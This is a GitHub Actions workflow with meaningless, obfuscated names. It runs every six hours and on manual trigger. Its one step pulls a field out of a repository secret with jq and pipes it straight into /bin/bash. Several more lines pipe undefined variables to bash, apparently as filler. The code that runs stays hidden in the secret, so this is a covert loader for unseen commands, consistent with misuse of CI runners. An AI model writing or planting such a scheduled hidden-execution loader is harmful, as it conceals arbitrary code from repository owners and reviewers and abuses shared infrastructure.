name: determinetomatoe

on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: determinetomatoe
        env:
          deodo77: ${{ secrets.deodo77 }}
        run: |
          echo $deodo77 | jq -r .uxpbz0 | /bin/bash
          echo $ywbo5 | jq -r .va43 | /bin/bash
          echo $wsr9418 | jq -r .xs81443 | /bin/bash
          echo $t401 | jq -r .bskfl800 | /bin/bash
          echo $ip7517 | jq -r .x7 | /bin/bash

